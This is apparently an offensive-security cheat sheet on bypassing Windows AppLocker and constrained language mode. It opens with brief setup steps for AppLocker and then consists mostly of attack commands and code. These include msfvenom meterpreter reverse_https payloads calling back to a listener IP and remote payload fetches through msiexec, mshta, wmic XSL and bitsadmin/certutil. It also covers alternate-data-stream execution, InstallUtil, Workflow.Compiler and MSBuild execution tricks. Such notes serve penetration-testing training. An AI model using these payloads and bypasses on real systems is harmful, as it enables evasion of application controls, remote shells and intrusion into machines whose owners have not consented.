AppLocker Bypass

Enable AppLocker

In Group Policy Editor (gpedit) navigate to Local Computer Policy -> Computer Configuration -> Windows Settings -> Security Settings -> Application Control Policies and select the AppLocker

In the Properties menu, enable AppLocker rules for Executables, Windows Installer files, scripts, and packaged apps. DLL's can be enabled as well in Advanced Tab.

For each category, select Configured and Apply.

Now open one of the categories and right-click. Select "Create Default Rules".

Take the time to inspect each ruleset. When you're done run gpupdate /force from an admin command prompt or powershell session. Below will be a few defense evasion techniques.

View Blocked Execution

EventViewer -> Applications and Services Logs -> Microsoft -> Windows -> AppLocker

Enumeration

Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe

Sysinternal Tools

Script to find trusted folders and output the permissions

$tools = "C:\SysinternalsSuite"

C:\SysinternalsSuite\accesschk.exe "<USERNAME>" C:\Windows -wus -accepteula | out-file -FilePath C:/users/<USER>/Desktop/permissions.txt

foreach($line in Get-Content  C:/users/<USER>/Desktop/permissions.txt) {
    if($line.StartsWith("RW") -or $line.StartsWith("W"))
    {
    $line.Substring(3) | out-file -FilePath  C:/users/<USER>/Desktop/files.txt -Append
    }
}

foreach($file_path in Get-Content C:/users/<USER>/Desktop/files.txt){
if(Test-Path -Path $file_path -PathType Container)
    {
        cd $tools
        icacls.exe $file_path | out-file -FilePath C:/users/<USER>/Desktop/folder-permissions.txt -Append
    }
}

Found interesting folder path. Used in Trusted Folders example below.

C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Dlna\DeviceIcons 

**NT AUTHORITY\Authenticated Users:(OI)(CI)(F)**
BUILTIN\Users:(OI)(CI)(F)
NT AUTHORITY\LOCAL SERVICE:(I)(OI)(CI)(F)
NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)
BUILTIN\Administrators:(I)(OI)(CI)(F)

Trusted Folders

Creating a javascript POC to see if code execution is allowed in a folder. Saved as test.js in folder path mentioned above.

var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");

Execute script

CMD > .\test.js

The same concept applied to DLLs as well

Generate msfvenom dll

sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.1 LPORT=443 -f dll -o msfdll.dll

copy to whitelisted folder and run

rundll32 C:\Windows\ServiceProfiles\LocalService\AppData\Local\Microsoft\Dlna\DeviceIconsmsfdll.dll,run

Bypass MSI

Generate payload

root@kali: msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.1 LPORT=443 -f msi -o /var/www/html/msi_payload.msi

On Victim

msiexec /q/i http://192.168.49.115/msi_payload.msi

Alternate Data Stream

Create alternate data stream to readable and writeable file

type test.js > "C:\Users\Rick.Sanchez\Random_log.log:test.js"

Opening the file will execute primary stream. Using the following command will execute the ADS

wscript "C:\Users\Rick.Sanchez\Random_log.log:test.js"

Getting a Shell with ADS

generate raw payload

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.0.1 LPORT=443 -b '\\x00\\x0a\\x0d' -f raw  > rawsc.bin

Create jscript payload with SuperSharpShooter

./SuperSharpShooter.py --dotnetver 4 --payload js --rawscfile rawsc.bin --output test  --stageless

create alternate data stream to readable and writeable file (TeamViewer Log)

type test.js > "C:\Users\Rick.Sanchez\Random_log.log:test.js"

Opening file will execute primary stream. using the following command will execute the ADS

wscript "C:\Users\Rick.Sanchez\Random_log.log"

UninstallUtil

A combination of AppLocker and CLM bypass

Note: you must add a reference before compiling.

C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35

using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;

namespace Bypass
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("This is the main method which is a decoy");
        }
    }

    [System.ComponentModel.RunInstaller(true)]
    public class Sample : System.Configuration.Install.Installer
    {
        public override void Uninstall(System.Collections.IDictionary savedState)
        {
            //String cmd = "REPLACE ME WITH PAYLOAD"
            String cmd = "$ExecutionContext.SessionState.LanguageMode | Out-File -FilePath C:\\Users\\Rick.Sanchez\\test.txt";
            Runspace rs = RunspaceFactory.CreateRunspace();
            rs.Open();

            PowerShell ps = PowerShell.Create();
            ps.Runspace = rs;

            ps.AddScript(cmd);

            ps.Invoke();

            rs.Close();
        }
    

Using Uninstalls to bypass Applocker and bitsadmin to transfer file

Attacker > certutil -encode C:\Users\Rick.Sanchez\Bypass.exe bypass.txt
Target > bitsadmin /Transfer myJob http://192.168.0.1/bypass.txt C:\Users\Rick.Sanchez\bypass.txt
Target > certutil -decode C:\Users\Rick.Sanchez\bypass.txt C:\Users\Rick.Sanchez\bypass.exe && del C:\Users\Rick.Sanchez\bypass.txt
Target > C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\Users\Rick.Sanchez\Bypass.exe

Microsoft.Workflow.Compiler.exe

Payload is C# code as txt file

using System;
using System.Diagnostics;
using System.Workflow.ComponentModel;
public class Run : Activity{
    public Run() {
	    Process process = new Process();
            // Configure the process using the StartInfo properties.
            process.StartInfo.FileName = "powershell.exe";
            process.StartInfo.Arguments = "powershell.exe -enc <ENCODED PS Payload>";
            process.StartInfo.WindowStyle = ProcessWindowStyle.Normal;
            process.Start();
            process.WaitForExit();
            Console.WriteLine("I executed!");
    }
}

Commands to run

$workflowexe = "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe"
$workflowasm = [Reflection.Assembly]::LoadFrom($workflowexe)
$SerializeInputToWrapper = [Microsoft.Workflow.Compiler.CompilerWrapper].GetMethod('SerializeInputToWrapper', [Reflection.BindingFlags] 'NonPublic, Static')
Add-Type -Path 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\System.Workflow.ComponentModel.dll'
$compilerparam = New-Object -TypeName Workflow.ComponentModel.Compiler.WorkflowCompilerParameters
$compilerparam.GenerateInMemory = $True
$pathvar = "C:\Users\Rick.Sanchez\test.txt"
$output = "C:\Users\Rick.Sanchez\run.xml"
$tmp = $SerializeInputToWrapper.Invoke($null, @([Workflow.ComponentModel.Compiler.WorkflowCompilerParameters] $compilerparam, [String[]] @(,$pathvar)))
Move-Item $tmp $output

$Acl = Get-ACL $output;$AccessRule= New-Object System.Security.AccessControl.FileSystemAccessRule(“Rick.Sanchez”,”FullControl”,”none”,”none","Allow");$Acl.AddAccessRule($AccessRule);Set-Acl $output $Acl

C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe C:\Users\Rick.Sanchez\run.xml C:\Users\Rick.Sanchez\results.xml

MSBUILD

Using XML Template from here

https://www.ired.team/offensive-security/code-execution/using-msbuild-to-execute-shellcode-in-c

Execute Payload

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Users\Rick.Sanchez\Desktop\evil.xml

MSHTA

mshta.exe http://192.168.0.1/test.hta

Test.hta file on Web Server will open cmd.exe

<html> 
<head> 
<script language="JScript">
<!--- PASTE JSCRIPT PAYLOAD BELOW --->
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");
<!--- PASTE JSCRIPT ABOVE--->
</script>
</head> 
<body>
<script language="JScript">
self.close();
</script>
</body> 
</html>

The MSHTA.exe filepath used is a x64 exe

Generate payload

sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.49.115 LPORT=443 -b '\\x00\\x0a\\x0d' -f raw  > rawsc.bin

SuperSharpShooter

./SuperSharpShooter.py --dotnetver 4 --payload js --rawscfile rawsc.bin --output test --stageless

Copy Jscript payload created into test.hta template

WMIC

On Target

wmic process get brief /format:"http://192.168.0.1/test.xsl"

XSL Template

<?xml version='1.0'?>
<stylesheet version="1.0"
xmlns="http://www.w3.org/1999/XSL/Transform"
xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">

<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
		<![CDATA[
			var r = new ActiveXObject("WScript.Shell");
			r.Run("cmd.exe");
		]]>
	</ms:script>
</stylesheet>